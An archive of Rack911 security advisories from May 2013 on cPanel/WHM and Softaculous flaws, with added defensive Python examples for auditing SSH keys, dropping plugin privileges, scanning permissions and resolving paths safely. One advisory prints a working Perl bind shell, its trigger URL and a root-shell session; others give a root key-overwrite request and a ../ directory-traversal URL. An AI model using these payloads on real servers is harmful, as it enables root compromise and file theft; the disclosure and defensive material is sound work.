Archive for May, 2013

cPanel – Reset Root SSH Key (R911-0004)

Monday, May 13th, 2013

Type: Authentication Bypass
Impact: Medium
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: 11.36.1.5 and earlier.
Fixed Version: 11.38.0.7
CVE: -
R911: 0004
Date: 2013-05-13
By: http://www.rack911.com

Product Description:

cPanel is an easy-to-use control panel that gives web hosts, and the website owners they serve, the ability to manage their servers and websites. Web Host Manager (WHM) is the part of cPanel used by resellers and system administrators.

Vulnerability Description:

WHM fails to restrict the Root SSH Key manager to the root user: a reseller can generate a new key pair under /root/.ssh/, overwriting an existing key if its file name is known or, when no name is supplied, the default key file (id_dsa for the DSA key type used in the proof of concept).

Proof of Concept:

1. Log into WHM with a reseller account.

2. Append the following paths to the WHM session URL (https://host:2087/cpsessXXXXXXXXXX/...); the first opens the key manager's add-key form, the second submits it with an empty key name:

/scripts2/ssh_addkey
/scripts2/ssh_doaddkey?name=&pass=PASSWORD&password2=PASSWORD&type=dsa&keysize=1024

Impact:

We rate this vulnerability MEDIUM because private keys under /root/.ssh/ can be overwritten; the practical effect on root is the loss of the overwritten key. At the time of writing it is not possible to use a private key generated by this exploit to gain access.
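From the defender's side the issue above is a file-integrity problem: root's private keys were replaced without root's involvement. The following script is an added example for this page, not part of the Rack911 advisory or of cPanel. It records a baseline of a .ssh directory and reports keys that have since appeared, changed, gone missing, or become readable by other accounts. The directory layout, key names and file contents in demo() are constructed for illustration; against a real server, run audit() on /root/.ssh with a baseline taken from a known-good state.

```python
"""
Added example for this page (not part of the Rack911 advisory or of cPanel):
audit a .ssh directory against a recorded baseline so that a private key
regenerated or overwritten behind root's back shows up. Directory layout,
key names and contents in demo() are constructed for illustration.
"""
import hashlib
import os
import stat
import tempfile
from typing import Dict, List, Tuple

Finding = Tuple[str, str]   # (status, file name)


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(directory: str) -> Dict[str, str]:
    """File name -> SHA-256 for every regular file directly inside directory."""
    snap: Dict[str, str] = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if stat.S_ISREG(os.lstat(path).st_mode):   # skip symlinks and subdirectories
            snap[name] = sha256_file(path)
    return snap


def is_private_key_name(name: str) -> bool:
    """OpenSSH default private key names: id_rsa, id_dsa, id_ecdsa, id_ed25519."""
    return name.startswith("id_") and not name.endswith(".pub")


def audit(directory: str, baseline: Dict[str, str]) -> List[Finding]:
    """Report 'new', 'changed' and 'missing' files relative to baseline, plus
    'perm' for any private key readable by group or other."""
    current = snapshot(directory)
    findings: List[Finding] = []
    for name, digest in current.items():
        if name not in baseline:
            findings.append(("new", name))
        elif baseline[name] != digest:
            findings.append(("changed", name))
        mode = os.lstat(os.path.join(directory, name)).st_mode
        if is_private_key_name(name) and mode & 0o077:
            findings.append(("perm", name))
    for name in baseline:
        if name not in current:
            findings.append(("missing", name))
    return findings


def write_key(path: str, data: bytes, mode: int = 0o600) -> None:
    """Create or overwrite a key file with an explicit mode (umask-independent)."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, mode)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    os.chmod(path, mode)


def demo() -> List[Finding]:
    """Constructed scenario: take a baseline of a root-style .ssh directory,
    then simulate the key manager adding id_dsa and replacing id_rsa."""
    with tempfile.TemporaryDirectory() as d:
        write_key(os.path.join(d, "id_rsa"), b"-----BEGIN RSA PRIVATE KEY-----\nORIGINAL\n")
        write_key(os.path.join(d, "id_rsa.pub"), b"ssh-rsa AAAA... root@host\n", 0o644)
        write_key(os.path.join(d, "authorized_keys"), b"ssh-rsa AAAA... admin@host\n")
        baseline = snapshot(d)
        # What the unrestricted key manager does on a reseller's request:
        write_key(os.path.join(d, "id_dsa"), b"-----BEGIN DSA PRIVATE KEY-----\nNEW\n")
        write_key(os.path.join(d, "id_rsa"), b"-----BEGIN RSA PRIVATE KEY-----\nREPLACED\n")
        return audit(d, baseline)


if __name__ == "__main__":
    for status, name in demo():
        print(f"{status:8s} {name}")
```

The baseline should be stored outside the audited directory (or on another host), since an attacker who can write /root/.ssh could otherwise update it too.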

Vulnerable Version:

This vulnerability was tested against cPanel (WHM) v11.36.1.5.

Fixed Version:

This vulnerability was patched in version 11.38.0.7, or possibly a few builds earlier; we are not sure, because cPanel stopped communicating with us on the matter and fixed it silently. All users are urged to upgrade as soon as possible.

Vendor Contact Timeline:

2013-05-04: Vendor contacted via email.
2013-05-06: Vendor confirms vulnerability.
2013-05-10: Vendor issues v11.38.0.7 update.
2013-05-13: Rack911 issues security advisory.

cPanel – Fundamental Security Failure

Monday, May 13th, 2013

Type: Fundamental Security Failure
Impact: High
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: All
Date: 2013-05-13
By: http://www.rack911.com

Product Description:

cPanel is an easy-to-use control panel that gives web hosts, and the website owners they serve, the ability to manage their servers and websites. Web Host Manager (WHM) is the part of cPanel used by resellers and system administrators.

Vulnerability Description:

This is not a vulnerability in the software itself but a discussion of how WHM trusts every third-party plugin with root-level access, which is a dangerous practice. When a reseller logs into WHM and opens a plugin, that plugin is executed as root. Should a plugin accessible to the reseller contain a vulnerability, it is trivial for the attacker to turn it into instant root access. This was brought to cPanel's attention as early as 2009, when several security flaws were found in popular third-party plugins that allowed instant root access. Had we published those flaws back then, it is safe to assume that at least 8 out of 10 hosting companies using cPanel would have been vulnerable to root compromise.

When we expressed our concerns to cPanel, both in 2009 and earlier this month, their response was essentially "not our problem", which we believe to be a terrible and reckless approach to security. cPanel's position is that, although WHM runs everything as root, it is up to the third-party developers to maintain a secure code base, and what happens after that is not cPanel's concern. While we agree that third-party developers share the responsibility, it is ultimately cPanel's platform that turns a small flaw into a big one. Think of it like this: cPanel is saying "Sure, we run PHP as root, but it's not our fault that WordPress had a flaw that allowed the server to get rooted." Everyone knows how dangerous it is to run PHP as root, yet that is effectively what cPanel is doing here.

As much as we would like to see WHM rewritten from scratch to prevent these attacks, we know that is not practical. Instead, we would like to see a mechanism, using ACLs or a wrapper of some kind, that executes third-party plugins in a sandboxed environment, so that a vulnerability in a plugin cannot yield root access under any circumstances.

We shared our ideas with cPanel and they were immediately shot down with irrelevant examples of why it cannot work. In our opinion, properly securing WHM against these attacks would not take a lot of effort; instead, cPanel has a pattern of deflecting blame when it comes to security, and we find that very chilling.

Make no mistake about it: anyone who uses cPanel should be concerned right now. There have been very real security flaws over the years that could have allowed an attacker to take over any cPanel server in a matter of seconds because of these fundamental security failures. It is our goal to bring public attention to this issue and put pressure on cPanel to implement the necessary changes.
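What the wrapper suggested above looks like in its simplest form, as an added example written for this page and not code that cPanel ships: the panel process, still root, starts the plugin in a child that sheds root before the plugin's own code runs, so a flaw in the plugin yields at most the unprivileged account's access. It assumes Linux (os.getresuid); the account, command and environment are placeholders.

```python
"""
Added example written for this page (not code that cPanel ships): the
smallest form of a privilege-dropping wrapper for third-party plugins. The
panel process, which is root, starts the plugin in a child that sheds root
before the plugin's own code runs. Assumes Linux (os.getresuid); account,
command and environment are placeholders.
"""
import os
import subprocess
from typing import Callable, List, Tuple


def make_privilege_drop(uid: int, gid: int) -> Callable[[], None]:
    """Pre-exec hook run in the child between fork() and exec()."""
    def hook() -> None:
        if os.getuid() == 0:
            os.setgroups([])          # supplementary groups survive setuid() otherwise
        os.setgid(gid)                # group before user: once uid is dropped we cannot
        os.setuid(uid)                # as root this sets real, effective and saved uid
        # Refuse to exec anything if the drop is partial (saved root uid left behind)
        if os.getresuid() != (uid, uid, uid) or os.getresgid() != (gid, gid, gid):
            os._exit(125)
    return hook


def run_plugin_unprivileged(argv: List[str], uid: int, gid: int,
                            timeout: float = 30.0) -> Tuple[int, bytes]:
    """Run argv as uid:gid with a scrubbed environment; return (exit status, output)."""
    if uid == 0 or gid == 0:
        raise ValueError("refusing to execute a plugin as root")
    env = {"PATH": "/usr/bin:/bin", "LANG": "C"}   # do not leak the panel's environment
    proc = subprocess.run(
        argv, env=env, preexec_fn=make_privilege_drop(uid, gid),
        stdin=subprocess.DEVNULL, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
        close_fds=True, timeout=timeout,
    )
    return proc.returncode, proc.stdout


def demo() -> Tuple[int, int, int]:
    """Run `id -u` through the wrapper; returns (requested uid, uid the plugin
    reported, exit status). Uses the current account when not root and 65534
    (nobody on most Linux systems) when the caller is root."""
    uid = os.getuid() if os.getuid() != 0 else 65534
    gid = os.getgid() if os.getgid() != 0 else 65534
    status, out = run_plugin_unprivileged(["/bin/sh", "-c", "id -u"], uid, gid)
    reported = int(out.strip()) if out.strip().isdigit() else -1
    return uid, reported, status


if __name__ == "__main__":
    print(demo())
```

A production version would add a chroot or mount namespace, resource limits, and a small privileged broker for the few actions a plugin legitimately needs root for; the point of the wrapper is that a bug in the plugin is no longer a bug in root.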

Proof of Concept:

The following is from an old exploit that has since been fixed, but the pattern applies to any future vulnerability in a third-party plugin. In this case the proof of concept is an RVSiteBuilder exploit that we manipulated to drop to an instant root shell.

RVSiteBuilder stored user uploads in world writable directories located under a directory accessible via WHM:

/usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilder/userdata/reseller/upload/

In that directory we created a file called exploit.cgi containing a simple Perl bind shell that listens on port 60000 and drops to a root prompt when a client connects. For reference, here is a copy of that bind shell:

#!/usr/bin/perl
#
# exploit.cgi - Perl bind shell dropped into the world-writable RVSiteBuilder
# upload directory. When WHM serves it, it runs with WHM's privileges (root).
#
use strict;
use warnings;

BEGIN {
    # Make cPanel's own Perl modules resolvable, as scripts under whostmgr expect
    unshift(@INC, '/usr/local/cpanel');
}
use Socket;

my $port   = 60000;             # TCP port to listen on
my $proto  = getprotobyname('tcp');
my $system = '/bin/sh -i';      # interactive shell handed to each client

# Listening socket bound to all interfaces
socket(SERVER, PF_INET, SOCK_STREAM, $proto)               or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY))               or die "bind: $!";
listen(SERVER, SOMAXCONN)                                  or die "listen: $!";

# For each client: wire stdin/stdout/stderr to the socket and spawn the shell
my $paddr;
for (; $paddr = accept(CLIENT, SERVER); close CLIENT) {
    open(STDIN,  ">&CLIENT");
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");
    system($system);
    close(STDIN);
    close(STDOUT);
    close(STDERR);
}

After we created exploit.cgi the next step was to log into WHM as the reseller and open the URL directly containing the bind shell. In this case it would have been:

https://domain.com:2087/cgi/rvsitebuilder/userdata/reseller/upload/exploit.cgi

Opening that URL executed the script as root, leaving a bind shell listening on port 60000 for us:

telnet domain.com 60000
Connected to domain.com.
Escape character is '^]'.
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)

Should this be allowed to happen? Absolutely not. We cannot stress enough how much of a failure it is on cPanel's part to trust every third-party plugin with root access. Any reseller on that server could have created that exploit.cgi via SSH, a cron job or many other means and gained instantaneous root access to do as they please.
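The RVSiteBuilder case above reduces to one check an administrator can run: is there anything under the WHM-served document root that a non-root account could create or modify? The scanner below is an added example for this page, not from the advisory or from cPanel. demo() builds a throwaway tree mirroring the upload directory named above; the "wellbehaved_addon" directory is a hypothetical control case, and the current account stands in for root as the trusted owner because the temporary files belong to it.

```python
"""
Added example for this page (not from the advisory or from cPanel): scan a
WHM-served document root for anything a non-root account could plant or
modify, since WHM executes what it serves as root. demo() builds a throwaway
tree mirroring the RVSiteBuilder upload directory named in the advisory; the
"wellbehaved_addon" directory is a hypothetical control case.
"""
import os
import stat
import tempfile
from typing import List, Tuple

SCRIPT_SUFFIXES = (".cgi", ".pl", ".php", ".sh", ".py")
UPLOAD_REL = "cgi/rvsitebuilder/userdata/reseller/upload"


def untrusted_reasons(path: str, trusted_uid: int, trusted_gid: int) -> List[str]:
    """Why a path could be modified by someone other than the trusted owner."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return ["symlink"]                       # may point outside the docroot
    reasons: List[str] = []
    if st.st_uid != trusted_uid:
        reasons.append("foreign-owner")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != trusted_gid:
        reasons.append("group-writable")
    return reasons


def scan_docroot(docroot: str, trusted_uid: int = 0,
                 trusted_gid: int = 0) -> List[Tuple[str, str]]:
    """Return sorted (reason, path relative to docroot) findings."""
    findings: List[Tuple[str, str]] = []
    for dirpath, _dirnames, filenames in os.walk(docroot):
        rel_dir = os.path.relpath(dirpath, docroot)
        dir_reasons = untrusted_reasons(dirpath, trusted_uid, trusted_gid)
        findings.extend((r, rel_dir) for r in dir_reasons)
        for fname in filenames:
            fpath = os.path.join(dirpath, fname)
            rel = os.path.relpath(fpath, docroot)
            findings.extend((r, rel) for r in untrusted_reasons(fpath, trusted_uid, trusted_gid))
            # A script anyone can drop into a root-executed directory is the
            # exploit.cgi case, even when the file itself looks tidy
            if dir_reasons and fname.endswith(SCRIPT_SUFFIXES):
                findings.append(("script-in-untrusted-dir", rel))
    return sorted(findings)


def _write_script(path: str) -> None:
    with open(path, "w") as fh:
        fh.write("#!/usr/bin/perl\nprint \"Content-type: text/plain\\n\\n\";\n")
    os.chmod(path, 0o755)


def demo() -> List[Tuple[str, str]]:
    """Constructed docroot: one world-writable plugin upload directory holding
    exploit.cgi, one well-behaved plugin directory."""
    with tempfile.TemporaryDirectory() as docroot:
        upload = os.path.join(docroot, *UPLOAD_REL.split("/"))
        addon = os.path.join(docroot, "cgi", "wellbehaved_addon")
        os.makedirs(upload)
        os.makedirs(addon)
        for d, subdirs, _ in os.walk(docroot):          # fixed modes, independent of umask
            for s in subdirs:
                os.chmod(os.path.join(d, s), 0o755)
        os.chmod(upload, 0o777)                          # the RVSiteBuilder mistake
        _write_script(os.path.join(upload, "exploit.cgi"))
        _write_script(os.path.join(addon, "index.cgi"))
        # Files here belong to the current account, so treat it as the trusted owner
        return scan_docroot(docroot, os.getuid(), os.getgid())


if __name__ == "__main__":
    for reason, path in demo():
        print(f"{reason:26s} {path}")
```

On a real server the call is scan_docroot("/usr/local/cpanel/whostmgr/docroot", 0, 0); every finding is a place where a non-root account's write becomes root's code.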

Impact:

We rate this fundamental security failure HIGH because any third-party plugin that is compromised will ultimately lead to a root compromise. At best the attacker gains root-level read access to sensitive files; at worst the attacker uses a Perl bind shell, as above, to drop to an instant root shell.

Softaculous – Privilege Escalation (R911-0003)

Tuesday, May 7th, 2013

Type: Privilege Escalation
Impact: Critical
Product: Softaculous
Website: http://www.softaculous.com
Vulnerable Version: 4.2.1, 4.2.2 and 4.2.3
Fixed Version: 4.2.4
CVE: -
R911: 0003
Date: 2013-05-07
By: Rack911, Avi Brender (www.elitehosts.com), and streaky

Product Description:

Softaculous is the leading auto installer with over 300 applications that can be installed by a click of the mouse. The software is in use by thousands of web hosting companies and works with various control panels such as cPanel, Plesk, DirectAdmin, InterWorx and H-Sphere.

Vulnerability Description:

An attacker can manipulate a SUID binary installed by Softaculous to escalate their privileges to root.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We rate this vulnerability CRITICAL because the exploit yields an instant root bind shell and can be executed by every user on the server, not just resellers. It can also be triggered via SSH, cron, CGI scripts or PHP scripts.

Vulnerable Version:

This vulnerability was tested against Softaculous v4.2.3 for cPanel but is also believed to exist under other control panels.

Fixed Version:

This vulnerability was patched in version v4.2.4.

Vendor Contact Timeline:

2013-05-07: Vendor contacted via email.
2013-05-07: Vendor confirms vulnerability.
2013-05-07: Vendor issues v4.2.4 update.
2013-05-07: Rack911 issues security advisory.

Softaculous – Directory Traversal (Root Access) (R911-0002)

Monday, May 6th, 2013

Type: Directory Traversal (Root Access)
Impact: Critical
Product: Softaculous
Website: http://www.softaculous.com
Vulnerable Version: 4.2.2
Fixed Version: 4.2.3
CVE: -
R911: 0002
Date: 2013-05-06
By: http://www.rack911.com

Product Description:

Softaculous is the leading auto installer with over 300 applications that can be installed by a click of the mouse. The software is in use by thousands of web hosting companies and works with various control panels such as cPanel, Plesk, DirectAdmin, InterWorx and H-Sphere.

Vulnerability Description:

An attacker with a reseller account can access Softaculous through WHM and, by requesting a particular URL, open the error page that is supposed to be restricted to root.

By default the error page displays a log file called error_log.log under the scripts directory; however, the attacker can make the page read, or delete, any file on the server, because of the fundamental flaw in WHM that executes plugins as root.

Proof of Concept:

Due to the nature of this security flaw, we will not be posting a Proof of Concept until a much later date.

Impact:

We rate this vulnerability CRITICAL because Softaculous, when accessed via WHM, runs as root and can therefore read any file regardless of ownership. (The error page also lets the attacker delete any file, which could render the server inoperable.)

Vulnerable Version:

This vulnerability was tested against Softaculous v4.2.2 for cPanel but is also confirmed to work under InterWorx with some slight changes to the exploit code.

Fixed Version:

This vulnerability was patched in version v4.2.3.

Vendor Contact Timeline:

2013-05-03: Vendor contacted via email.
2013-05-04: Vendor confirms vulnerability.
2013-05-06: Vendor issues v4.2.3 update.
2013-05-06: Rack911 issues security advisory.

Softaculous – Directory Traversal (R911-0001)

Monday, May 6th, 2013

Type: Directory Traversal
Impact: Low
Product: Softaculous
Website: http://www.softaculous.com
Vulnerable Version: 4.2.2
Fixed Version: 4.2.3
CVE: -
R911: 0001
Date: 2013-05-06
By: https://www.rack911.com

Product Description:

Softaculous is the leading auto installer with over 300 applications that can be installed by a click of the mouse. The software is in use by thousands of web hosting companies and works with various control panels such as cPanel, Plesk, DirectAdmin, InterWorx and H-Sphere.

Vulnerability Description:

An attacker can access Softaculous through cPanel and manipulate the backup download feature to retrieve files outside the backup directory using a basic directory traversal.

Proof of Concept:

1. Log into cPanel with a standard account.

2. Append the following path to the cPanel session URL:

/frontend/x3/softaculous/index.live.php?act=backups&download=../../../../../../etc/hosts

Note: the number of ../ segments needed depends on where the scripts directory sits in the filesystem; add more until the traversal reaches the root directory (extra segments beyond / are harmless).
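The download parameter above and the error-page file parameter in R911-0002 are the same bug: a user-supplied name joined onto a base directory with no containment check. The example below is added for this page and is not Softaculous code; it shows the naive resolution next to a hardened version, including the case where the attacker cannot traverse but can plant a symlink inside the directory. Function and file names are this example's own, and it assumes a POSIX filesystem.

```python
"""
Added example (not Softaculous code): the naive path handling behind a
"download this backup" or "show this log file" parameter, beside a hardened
version. Function and file names are this example's own; only the ../
traversal pattern comes from the advisories. Assumes a POSIX filesystem.
"""
import os
import tempfile
from typing import Dict, Optional


def vulnerable_resolve(backups_dir: str, requested: str) -> str:
    """A bare join: every ../ in requested walks one level out of backups_dir,
    so enough of them reach / and then any file the process can read."""
    return os.path.normpath(os.path.join(backups_dir, requested))


def safe_resolve(backups_dir: str, requested: str) -> Optional[str]:
    """Return the real path of a file inside backups_dir, or None to refuse."""
    if not requested or "\x00" in requested or os.path.isabs(requested):
        return None
    if requested in (".", "..") or os.path.basename(requested) != requested:
        return None                                   # no directory components at all
    base = os.path.realpath(backups_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath follows symlinks, so a link planted inside backups_dir that
    # points elsewhere fails the containment check as well
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo() -> Dict[str, Optional[str]]:
    """Constructed layout: a backups directory with one real archive and a
    symlink planted by the account to a file outside the directory."""
    with tempfile.TemporaryDirectory() as tmp:
        backups = os.path.join(tmp, "backups")
        os.mkdir(backups)
        open(os.path.join(backups, "site.tar.gz"), "wb").close()
        secret = os.path.join(tmp, "secret.txt")
        open(secret, "wb").close()
        os.symlink(secret, os.path.join(backups, "planted"))
        # One ../ per directory above backups/, which is what the advisory's
        # note about adding more ../ segments amounts to
        payload = "../" * backups.count(os.sep) + "etc/hosts"
        legit = safe_resolve(backups, "site.tar.gz")
        return {
            "vulnerable": vulnerable_resolve(backups, payload),
            "traversal": safe_resolve(backups, payload),
            "absolute": safe_resolve(backups, "/etc/hosts"),
            "symlink": safe_resolve(backups, "planted"),
            "legit": os.path.basename(legit) if legit else None,
        }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:10s} {result}")
```

The basename check alone would already stop the advisory's payload; the realpath plus commonpath check is what also closes the symlink route, and it is the check to keep if the feature must later accept subdirectories.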

Impact:

We rate this vulnerability LOW because Softaculous, when accessed via cPanel, runs as the cPanel user, which limits the files that can be downloaded to those the user can already read.

Vulnerable Version:

This vulnerability was tested against Softaculous v4.2.2 for cPanel but is also confirmed to work under InterWorx with some slight changes to the exploit code.

Fixed Version:

This vulnerability was patched in version v4.2.3.

Vendor Contact Timeline:

2013-05-03: Vendor contacted via email.
2013-05-04: Vendor confirms vulnerability.
2013-05-06: Vendor issues v4.2.3 update.
2013-05-06: Rack911 issues security advisory.